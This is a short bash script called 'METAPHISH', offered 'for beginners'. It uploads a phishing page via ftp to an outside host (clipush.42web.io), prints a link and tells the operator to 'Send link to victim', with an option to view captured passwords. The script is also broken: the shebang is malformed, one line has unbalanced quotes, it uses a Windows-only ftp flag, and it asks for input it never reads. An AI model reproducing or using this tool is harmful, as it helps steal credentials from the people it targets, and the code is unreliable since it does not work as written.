#!bin/bash
clear
echo "METAPHISH STARTED..."
echo
echo "Tool By nerdhacker000 On Github, Made For Beginners"
echo "---------------------------------------" 
echo "1. Type your email and send link to target"
echo "---------------------------------------" 
echo "2. Type:"vpass"to view passwords
echo "---------------------------------------" 
echo "3 Go to my website for more: nerdhaka.blogspot.com" 
echo "Type \'1\' To Begin Process"
echo "Enter your email:"
read email
echo "..."
echo
ftp -s:host.txt
echo "Successively hosted at: http://clipush.42web.io/$email"
echo "- - - - "
echo Send link to victim
